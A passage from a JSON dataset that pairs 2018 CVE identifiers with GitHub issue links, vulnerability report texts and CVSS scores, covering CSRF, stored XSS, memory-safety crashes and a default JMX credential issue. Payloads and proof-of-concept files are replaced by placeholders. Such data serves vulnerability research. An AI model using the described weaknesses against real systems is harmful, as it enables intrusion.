  88422. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  88423. "severity": "MEDIUM",
  88424. "baseScore": 6.1,
  88425. "impactScore": 2.7,
  88426. "exploitabilityScore": 2.8
  88427. },
  88428. {
  88429. "CVE_ID": "CVE-2018-11307",
  88430. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2032",
  88431. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2032",
  88432. "Repo_new": "fasterxml/jackson-databind",
  88433. "Issue_Created_At": "2018-05-10T04:23:03Z",
  88434. "description": "Security issue with default typing, another reported potential gadget type. (note: this is a placeholder and more details will be added after fix added, and ideally CVE allocated) A new potential gadget type has been reported, possibly affecting databind up to and including APITAG , APITAG , APITAG (as well as earlier minor versions). Type is from APITAG library.",
  88435. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  88436. "severity": "CRITICAL",
  88437. "baseScore": 9.8,
  88438. "impactScore": 5.9,
  88439. "exploitabilityScore": 3.9
  88440. },
  88441. {
  88442. "CVE_ID": "CVE-2018-11405",
  88443. "Issue_Url_old": "https://github.com/Kliqqi-CMS/Kliqqi-CMS/issues/256",
  88444. "Issue_Url_new": "https://github.com/kliqqi-cms/kliqqi-cms/issues/256",
  88445. "Repo_new": "kliqqi-cms/kliqqi-cms",
  88446. "Issue_Created_At": "2018-05-23T14:59:19Z",
  88447. "description": "There is a CSRF which can create an account with admin's privileges.. After admin logging in,click the following link,eviladmin will be created with admin's privileges. APITAG CODETAG",
  88448. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88449. "severity": "HIGH",
  88450. "baseScore": 8.8,
  88451. "impactScore": 5.9,
  88452. "exploitabilityScore": 2.8
  88453. },
  88454. {
  88455. "CVE_ID": "CVE-2018-11489",
  88456. "Issue_Url_old": "https://github.com/pts/sam2p/issues/37",
  88457. "Issue_Url_new": "https://github.com/pts/sam2p/issues/37",
  88458. "Repo_new": "pts/sam2p",
  88459. "Issue_Created_At": "2018-05-24T02:23:49Z",
  88460. "description": "Heap Buffer Overflow NUMBERTAG in function APITAG in cgif.c. Here is the bug NUMBERTAG else NUMBERTAG Its a code to needed to be traced: trace the linked list NUMBERTAG until the prefix is a pixel, while pushing the suffi NUMBERTAG pixels on our stack. If we done, pop the stack in reverse NUMBERTAG thats what stack is good for!) order to output NUMBERTAG if APITAG == NO_SUCH_CODE) { in line NUMBERTAG APITAG should be checked cause Prefix is a array which has LZ_MAX_CODE NUMBERTAG size: unsigned int Prefix[LZ_MAX_CODE NUMBERTAG The crash appears as follows: (gdb) run crash NUMBERTAG FILETAG Program received signal SIGSEGV, Segmentation fault NUMBERTAG in APITAG APITAG \"\", APITAG APITAG at APITAG NUMBERTAG if APITAG == NO_SUCH_CODE) { (gdb) bt NUMBERTAG in APITAG APITAG \"\", APITAG APITAG at APITAG NUMBERTAG eb in APITAG APITAG Line=<optimized out>, APITAG out>) at APITAG NUMBERTAG ba in APITAG APITAG at APITAG NUMBERTAG d in in_gif_reader (ufd=<optimized out>) at APITAG NUMBERTAG fca8 in Image::load (ufd NUMBERTAG a NUMBERTAG APITAG format=format APITAG at APITAG NUMBERTAG eb0 in run_sam2p_engine (sout=..., serr=..., arg NUMBERTAG optimized out>, helpp=helpp APITAG at APITAG NUMBERTAG d0 in main (arg NUMBERTAG fffffffe5c8) at APITAG (gdb) p APITAG NUMBERTAG gdb)",
  88461. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88462. "severity": "HIGH",
  88463. "baseScore": 8.8,
  88464. "impactScore": 5.9,
  88465. "exploitabilityScore": 2.8
  88466. },
  88467. {
  88468. "CVE_ID": "CVE-2018-11499",
  88469. "Issue_Url_old": "https://github.com/sass/libsass/issues/2643",
  88470. "Issue_Url_new": "https://github.com/sass/libsass/issues/2643",
  88471. "Repo_new": "sass/libsass",
  88472. "Issue_Created_At": "2018-05-02T00:22:46Z",
  88473. "description": "APITAG heap use after free in libsass. Hey there, I have discovered a use after free vulnerability in libsass. Found when fuzzing commit APITAG of libsass, using commit aa6d5c6 URLTAG of sassc as a harness. After testing all releases, it is evident this was introduced in release NUMBERTAG of libsass. Compile flags to reproduce: APITAG You can find the case file FILETAG . ASAN report is as follows: ERRORTAG",
  88474. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  88475. "severity": "CRITICAL",
  88476. "baseScore": 9.8,
  88477. "impactScore": 5.9,
  88478. "exploitabilityScore": 3.9
  88479. },
  88480. {
  88481. "CVE_ID": "CVE-2018-11512",
  88482. "Issue_Url_old": "https://github.com/Creatiwity/wityCMS/issues/150",
  88483. "Issue_Url_new": "https://github.com/creatiwity/witycms/issues/150",
  88484. "Repo_new": "creatiwity/witycms",
  88485. "Issue_Created_At": "2018-05-27T05:25:29Z",
  88486. "description": "Persistent XSS on APITAG name' field (site_title). Hi guys, wonderful work on the CMS! I found a security issue on the website's name in the admin settings: Stored cross site scripting (XSS) vulnerability in the APITAG name\" field found in the APITAG page under the APITAG menu in APITAG NUMBERTAG allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to PATHTAG This vulnerability is specifically the APITAG name\" field. I noticed that it does strip off the tags APITAG and APITAG however, it isn't recursive. By entering this payload: APITAG Javascript gets executed. Here's an output of the mentioned payload when entered and saved. FILETAG The payload gets saved in the file: PATHTAG as a raw Javascript code: FILETAG When an unauthenticated user visits the page, the code gets executed: FILETAG If the data is not sanitized upon input, these components are going to return arbitrary web script or HTML that can be rendered by the browser because it retrieves the script, hence, the possible APITAG Components\" are as follow: Potentially all scripts using: PATHTAG Potentially all scripts using: PATHTAG PATHTAG PATHTAG PATHTAG There may be more but I believe this can be fixed by recursively stripping out the tags APITAG and APITAG",
  88487. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  88488. "severity": "MEDIUM",
  88489. "baseScore": 4.8,
  88490. "impactScore": 2.7,
  88491. "exploitabilityScore": 1.7
  88492. },
  88493. {
  88494. "CVE_ID": "CVE-2018-11531",
  88495. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/283",
  88496. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/283",
  88497. "Repo_new": "exiv2/exiv2",
  88498. "Issue_Created_At": "2018-04-22T13:18:05Z",
  88499. "description": "heap buffer overflow in APITAG ERRORTAG Reproducer: FILETAG SHA1: APITAG Tools: afl NUMBERTAG b, afl utils",
  88500. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  88501. "severity": "CRITICAL",
  88502. "baseScore": 9.8,
  88503. "impactScore": 5.9,
  88504. "exploitabilityScore": 3.9
  88505. },
  88506. {
  88507. "CVE_ID": "CVE-2018-11558",
  88508. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/66",
  88509. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/66",
  88510. "Repo_new": "domainmod/domainmod",
  88511. "Issue_Created_At": "2018-05-29T14:29:58Z",
  88512. "description": "There are two Stored XSS vulnerability. There are two Stored XSS vulnerability. read only user use the add the Stored XSS and CSRF can add administrator account or change the read only user to admin or change admin password\u2026\u2026 poc: after read only user login post url APITAG post data: APITAG then the admin login ,open the url URLTAG the javascript will execution. with CSRF vulnerability( URLTAG , a read only user can add administrator account or change the read only user to admin or change admin password\u2026\u2026",
  88513. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  88514. "severity": "MEDIUM",
  88515. "baseScore": 5.4,
  88516. "impactScore": 2.7,
  88517. "exploitabilityScore": 2.3
  88518. },
  88519. {
  88520. "CVE_ID": "CVE-2018-11624",
  88521. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1149",
  88522. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1149",
  88523. "Repo_new": "imagemagick/imagemagick",
  88524. "Issue_Created_At": "2018-05-29T08:23:54Z",
  88525. "description": "heap use after free. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Version: APITAG NUMBERTAG Q NUMBERTAG Steps to Reproduce ERRORTAG POC FILETAG System Configuration APITAG version NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on):ubuntu NUMBERTAG Additional information: Found by: Wang Zongming",
  88526. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88527. "severity": "HIGH",
  88528. "baseScore": 8.8,
  88529. "impactScore": 5.9,
  88530. "exploitabilityScore": 2.8
  88531. },
  88532. {
  88533. "CVE_ID": "CVE-2018-11626",
  88534. "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/12",
  88535. "Issue_Url_new": "https://github.com/saharatul/sela/issues/12",
  88536. "Repo_new": "saharatul/sela",
  88537. "Issue_Created_At": "2018-05-29T09:24:38Z",
  88538. "description": "stack buffer overflow in varible keys_inst. Hello,I use my company tools to fuzz test on sela.I first found the APITAG I want to show error information to your guys.",
  88539. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  88540. "severity": "HIGH",
  88541. "baseScore": 7.5,
  88542. "impactScore": 3.6,
  88543. "exploitabilityScore": 3.9
  88544. },
  88545. {
  88546. "CVE_ID": "CVE-2018-11694",
  88547. "Issue_Url_old": "https://github.com/sass/libsass/issues/2663",
  88548. "Issue_Url_new": "https://github.com/sass/libsass/issues/2663",
  88549. "Repo_new": "sass/libsass",
  88550. "Issue_Created_At": "2018-06-03T02:24:31Z",
  88551. "description": "APITAG null pointer dereference (SEGV) in APITAG ( PATHTAG ). Hey there, I have discovered a null pointer dereference in libsass at: APITAG URLTAG Found when fuzzing commit APITAG of libsass, using commit aa6d5c6 URLTAG of sassc as a harness. Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in libsass releases from FILETAG until the commit listed above. You can find a collection of APITAG files that trigger the bug FILETAG . The full ASAN report is shown below: ERRORTAG",
  88552. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88553. "severity": "HIGH",
  88554. "baseScore": 8.8,
  88555. "impactScore": 5.9,
  88556. "exploitabilityScore": 2.8
  88557. },
  88558. {
  88559. "CVE_ID": "CVE-2018-12052",
  88560. "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/3",
  88561. "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/3",
  88562. "Repo_new": "unh3x/just4cve",
  88563. "Issue_Created_At": "2018-06-07T01:42:54Z",
  88564. "description": "FILETAG",
  88565. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  88566. "severity": "CRITICAL",
  88567. "baseScore": 9.8,
  88568. "impactScore": 5.9,
  88569. "exploitabilityScore": 3.9
  88570. },
  88571. {
  88572. "CVE_ID": "CVE-2018-12503",
  88573. "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/81",
  88574. "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/81",
  88575. "Repo_new": "syoyo/tinyexr",
  88576. "Issue_Created_At": "2018-06-16T11:25:40Z",
  88577. "description": "Heap buffer overflow in APITAG I build tinyexr with clang and address sanitizer. When testcase (see: URLTAG is input into test_tinyexr (command: ./test_tinyexr testcase), a heap buffer overflow has triggered NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG e0 at pc NUMBERTAG c NUMBERTAG bp NUMBERTAG ffe NUMBERTAG d NUMBERTAG sp NUMBERTAG ffe NUMBERTAG d NUMBERTAG READ of size NUMBERTAG at NUMBERTAG e0 thread T NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG f in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f5e NUMBERTAG e9e NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG b3e8 in _start ( PATHTAG NUMBERTAG e0 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG a8 in operator new(unsigned long) PATHTAG NUMBERTAG b3f4 in APITAG char>::allocate(unsigned long, void const ) PATHTAG NUMBERTAG b3f4 in APITAG char> APITAG char>&, unsigned long) PATHTAG NUMBERTAG b3f4 in APITAG char, std::allocator<unsigned char> >::_M_allocate(unsigned long) PATHTAG NUMBERTAG b3f4 in APITAG char, std::allocator<unsigned char> >::_M_create_storage(unsigned long) PATHTAG NUMBERTAG b3f4 in APITAG char, std::allocator<unsigned char> APITAG long, std::allocator<unsigned char> const&) PATHTAG NUMBERTAG b3f4 in std::vector<unsigned char, std::allocator<unsigned char> >::vector(unsigned long, std::allocator<unsigned char> const&) PATHTAG NUMBERTAG b3f4 in APITAG PATHTAG NUMBERTAG f in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f5e NUMBERTAG e9e NUMBERTAG f in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa]fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  88578. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  88579. "severity": "CRITICAL",
  88580. "baseScore": 9.8,
  88581. "impactScore": 5.9,
  88582. "exploitabilityScore": 3.9
  88583. },
  88584. {
  88585. "CVE_ID": "CVE-2018-12504",
  88586. "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/82",
  88587. "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/82",
  88588. "Repo_new": "syoyo/tinyexr",
  88589. "Issue_Created_At": "2018-06-16T11:26:12Z",
  88590. "description": "Assert failure. When testcase (see: URLTAG is input into test_tinyexr (command: ./test_tinyexr testcase), a assert failure problem is triggered in APITAG test_tinyexr: . APITAG void APITAG , int , size_t , int, const APITAG ): Assertion NUMBERTAG failed. Aborted",
  88591. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  88592. "severity": "HIGH",
  88593. "baseScore": 7.5,
  88594. "impactScore": 3.6,
  88595. "exploitabilityScore": 3.9
  88596. },
  88597. {
  88598. "CVE_ID": "CVE-2018-12600",
  88599. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1178",
  88600. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1178",
  88601. "Repo_new": "imagemagick/imagemagick",
  88602. "Issue_Created_At": "2018-06-19T13:48:40Z",
  88603. "description": "out of bounds write in dib.c. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description CODETAG Similar to URLTAG the APITAG in coders/dib.c may cause an out of bounds write bug Steps to Reproduce In coders/dib.c ERRORTAG (image >rows y NUMBERTAG bytes_per_line may be much larger than APITAG will cause an out of bounds write bug in line NUMBERTAG of coders/dib.c To reproduce this problem: ERRORTAG Debugging information\uff1a ERRORTAG POC FILETAG System Configuration APITAG APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on):ubuntu NUMBERTAG Additional information: Credit: Zongming Wang from Chengdu Security Response Center of Qihoo NUMBERTAG Technology Co. Ltd.",
  88604. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88605. "severity": "HIGH",
  88606. "baseScore": 8.8,
  88607. "impactScore": 5.9,
  88608. "exploitabilityScore": 2.8
  88609. },
  88610. {
  88611. "CVE_ID": "CVE-2018-12654",
  88612. "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/98",
  88613. "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/98",
  88614. "Repo_new": "slims/slims8_akasia",
  88615. "Issue_Created_At": "2018-06-21T03:22:13Z",
  88616. "description": "FILETAG FILETAG",
  88617. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  88618. "severity": "MEDIUM",
  88619. "baseScore": 6.1,
  88620. "impactScore": 2.7,
  88621. "exploitabilityScore": 2.8
  88622. },
  88623. {
  88624. "CVE_ID": "CVE-2018-12680",
  88625. "Issue_Url_old": "https://github.com/Tanganelli/CoAPthon/issues/135",
  88626. "Issue_Url_new": "https://github.com/tanganelli/coapthon/issues/135",
  88627. "Repo_new": "tanganelli/coapthon",
  88628. "Issue_Created_At": "2018-12-27T14:24:00Z",
  88629. "description": "Denial of Service vulnerability caused by improper exception handling while parsing of APITAG messages. Multiple sample applications from APITAG library are vulnerable to Denial of Service attacks caused by maliciously crafted APITAG messages. Method APITAG improperly handle multiple exception types leading to crash of applications (including standard APITAG server, APITAG client, APITAG reverse proxy, example collect APITAG server and client). Example payloads and unhandled exceptions NUMBERTAG File: ERRORTAG (attached) Error message: File PATHTAG line NUMBERTAG in convert_to_raw return bytearray(value, \"utf NUMBERTAG ERRORTAG 'ascii' codec can't decode byte NUMBERTAG b9 in position NUMBERTAG ordinal not in range NUMBERTAG File: ERRORTAG Error message: File PATHTAG line NUMBERTAG in add_option raise ERRORTAG : %s is not repeatable\", APITAG ERRORTAG APITAG : %s is not repeatable', 'If None Match NUMBERTAG File: ERRORTAG Error message: File PATHTAG line NUMBERTAG in APITAG length = s.unpack_from(values FILETAG Issue was reported via email on NUMBERTAG rd of February NUMBERTAG to APITAG developers and registered in CVE database (reserved id is: CVETAG ).",
  88630. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  88631. "severity": "HIGH",
  88632. "baseScore": 7.5,
  88633. "impactScore": 3.6,
  88634. "exploitabilityScore": 3.9
  88635. },
  88636. {
  88637. "CVE_ID": "CVE-2018-12913",
  88638. "Issue_Url_old": "https://github.com/richgel999/miniz/issues/90",
  88639. "Issue_Url_new": "https://github.com/richgel999/miniz/issues/90",
  88640. "Repo_new": "richgel999/miniz",
  88641. "Issue_Created_At": "2018-06-27T09:25:59Z",
  88642. "description": "miniz_tinfl.c NUMBERTAG has an infinite loop. in miniz_tinfl.c NUMBERTAG has an infinite loop,sym2 and counter always equal NUMBERTAG i use example3 to test poc\uff1a FILETAG",
  88643. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  88644. "severity": "HIGH",
  88645. "baseScore": 7.5,
  88646. "impactScore": 3.6,
  88647. "exploitabilityScore": 3.9
  88648. },
  88649. {
  88650. "CVE_ID": "CVE-2018-12971",
  88651. "Issue_Url_old": "https://github.com/teameasy/EasyCMS/issues/3",
  88652. "Issue_Url_new": "https://github.com/teameasy/easycms/issues/3",
  88653. "Repo_new": "teameasy/easycms",
  88654. "Issue_Created_At": "2018-06-28T11:25:28Z",
  88655. "description": "There is a CSRF vulnerability which can delete user account. First I add NUMBERTAG user accounts as ID NUMBERTAG FILETAG We can delete these accounts by submiting this html form. CODETAG FILETAG FILETAG Then the user accounts had been deleted!!! FILETAG",
  88656. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  88657. "severity": "MEDIUM",
  88658. "baseScore": 6.5,
  88659. "impactScore": 3.6,
  88660. "exploitabilityScore": 2.8
  88661. },
  88662. {
  88663. "CVE_ID": "CVE-2018-13003",
  88664. "Issue_Url_old": "https://github.com/OpenTSDB/opentsdb/issues/1241",
  88665. "Issue_Url_new": "https://github.com/opentsdb/opentsdb/issues/1241",
  88666. "Repo_new": "opentsdb/opentsdb",
  88667. "Issue_Created_At": "2018-06-29T03:24:39Z",
  88668. "description": "Vul.",
  88669. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  88670. "severity": "MEDIUM",
  88671. "baseScore": 6.1,
  88672. "impactScore": 2.7,
  88673. "exploitabilityScore": 2.8
  88674. },
  88675. {
  88676. "CVE_ID": "CVE-2018-13419",
  88677. "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/398",
  88678. "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/398",
  88679. "Repo_new": "libsndfile/libsndfile",
  88680. "Issue_Created_At": "2018-07-05T10:23:37Z",
  88681. "description": "memory leaks detected. APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG ffff6b3deb7 in psf_allocate APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG in realloc ( PATHTAG NUMBERTAG ffff6b4fb NUMBERTAG in psf_bump_header_allocation APITAG NUMBERTAG ffff6b4fb NUMBERTAG in header_seek APITAG NUMBERTAG ffff6b4fb NUMBERTAG in psf_binheader_readf APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG ffff6bfe0a0 in psf_store_read_chunk APITAG NUMBERTAG ffff6bfe0a0 in psf_store_read_chunk_u NUMBERTAG APITAG NUMBERTAG ffff6c NUMBERTAG PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG ffff6aaed7f in wav_open APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG in realloc ( PATHTAG NUMBERTAG ffff6be NUMBERTAG in psf_store_string APITAG The command line is ./sndfile convert NUMBERTAG wav ./out.prc where NUMBERTAG wav is just a simple wav file.",
  88682. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88683. "severity": "MEDIUM",
  88684. "baseScore": 6.5,
  88685. "impactScore": 3.6,
  88686. "exploitabilityScore": 2.8
  88687. },
  88688. {
  88689. "CVE_ID": "CVE-2018-13420",
  88690. "Issue_Url_old": "https://github.com/gperftools/gperftools/issues/1013",
  88691. "Issue_Url_new": "https://github.com/gperftools/gperftools/issues/1013",
  88692. "Repo_new": "gperftools/gperftools",
  88693. "Issue_Created_At": "2018-07-06T07:26:30Z",
  88694. "description": "Memory leaks detected . When run program sampler_test, a memory leak has been found ERRORTAG",
  88695. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  88696. "severity": "HIGH",
  88697. "baseScore": 7.5,
  88698. "impactScore": 3.6,
  88699. "exploitabilityScore": 3.9
  88700. },
  88701. {
  88702. "CVE_ID": "CVE-2018-13848",
  88703. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/285",
  88704. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/285",
  88705. "Repo_new": "axiomatic-systems/bento4",
  88706. "Issue_Created_At": "2018-07-10T02:27:46Z",
  88707. "description": "A SEGV signal occurred when running mp4compact. A SEGV signal occurred when running mp4compact at APITAG ERRORTAG The testing program is mp4compact. And the input file has been put at: URLTAG",
  88708. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  88709. "severity": "HIGH",
  88710. "baseScore": 7.5,
  88711. "impactScore": 3.6,
  88712. "exploitabilityScore": 3.9
  88713. },
  88714. {
  88715. "CVE_ID": "CVE-2018-14015",
  88716. "Issue_Url_old": "https://github.com/radare/radare2/issues/10465",
  88717. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/10465",
  88718. "Repo_new": "radareorg/radare2",
  88719. "Issue_Created_At": "2018-06-24T12:26:03Z",
  88720. "description": "null pointer error at APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | ELF. | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG c NUMBERTAG a8 commit NUMBERTAG c NUMBERTAG build NUMBERTAG Expected behavior r2 should analyze a elf binary quickly Actual behavior r2 leads to the null pointer error Steps to reproduce the behavior Download FILETAG run r2 A Q $POC The Address Sanitizer output APITAG ERRORTAG",
  88721. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88722. "severity": "MEDIUM",
  88723. "baseScore": 5.5,
  88724. "impactScore": 3.6,
  88725. "exploitabilityScore": 1.8
  88726. },
  88727. {
  88728. "CVE_ID": "CVE-2018-14017",
  88729. "Issue_Url_old": "https://github.com/radare/radare2/issues/10498",
  88730. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/10498",
  88731. "Repo_new": "radareorg/radare2",
  88732. "Issue_Created_At": "2018-06-26T02:43:50Z",
  88733. "description": "APITAG heap buffer overflow at APITAG | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Java Class | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG c NUMBERTAG a8 commit NUMBERTAG c NUMBERTAG build NUMBERTAG Expected behavior r2 should analyze a java class binary quickly Actual behavior r2 leads to the heap buffer overflow Steps to reproduce the behavior Download POC URLTAG run r2 A Q $POC The Address Sanitizer output APITAG ERRORTAG",
  88734. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88735. "severity": "MEDIUM",
  88736. "baseScore": 5.5,
  88737. "impactScore": 3.6,
  88738. "exploitabilityScore": 1.8
  88739. },
  88740. {
  88741. "CVE_ID": "CVE-2018-14052",
  88742. "Issue_Url_old": "https://github.com/marc-q/libwav/issues/19",
  88743. "Issue_Url_new": "https://github.com/marc-q/libwav/issues/19",
  88744. "Repo_new": "marc-q/libwav",
  88745. "Issue_Created_At": "2018-07-12T11:25:43Z",
  88746. "description": "SEGV in function apply_gain in wav_gain.c. I use Clang NUMBERTAG and APITAG to build libwav , this file URLTAG can cause SEGV signal in function APITAG when running the APITAG in folder APITAG with the following command: APITAG This is the ASAN information: ERRORTAG",
  88747. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88748. "severity": "MEDIUM",
  88749. "baseScore": 6.5,
  88750. "impactScore": 3.6,
  88751. "exploitabilityScore": 2.8
  88752. },
  88753. {
  88754. "CVE_ID": "CVE-2018-14324",
  88755. "Issue_Url_old": "https://github.com/eclipse-ee4j/glassfish/issues/22500",
  88756. "Issue_Url_new": "https://github.com/eclipse-ee4j/glassfish/issues/22500",
  88757. "Repo_new": "eclipse-ee4j/glassfish",
  88758. "Issue_Created_At": "2018-04-20T01:50:23Z",
  88759. "description": "Glassfish jmx_rmi Remote monitoring and control problem. Glassfish jmx_rmi Remote monitoring and control problem Environment Details APITAG Version (and build number NUMBERTAG JDK version NUMBERTAG OS: win7 Problem Description Open demo by default. APITAG will open the NUMBERTAG port by default. And can be remotely accessed. Discover JMX URL: PATHTAG JMX is a weak password. admin/admin Meanwhile, more information is missing from FILETAG . Then click the corresponding function. amx support > operation > APITAG Come out of a amx directory. In amx, may Remotely operated functions such as deleting demo, stopping, closing, creating, and database operation. And there's a lot of server information here. Here is a simple java sample for remote access to information through Glassfish JMX. ERRORTAG Impact of Issue This is originally a remote monitoring performance JMX. I don't want it to be a loophole for others to invade me. I hope you can turn it off by default. He does have a certain degree of harm. It can also be remotely manipulated. Thank you very much. Sorry to disturb you \uff01",
  88760. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  88761. "severity": "CRITICAL",
  88762. "baseScore": 9.8,
  88763. "impactScore": 5.9,
  88764. "exploitabilityScore": 3.9
  88765. },
  88766. {
  88767. "CVE_ID": "CVE-2018-14382",
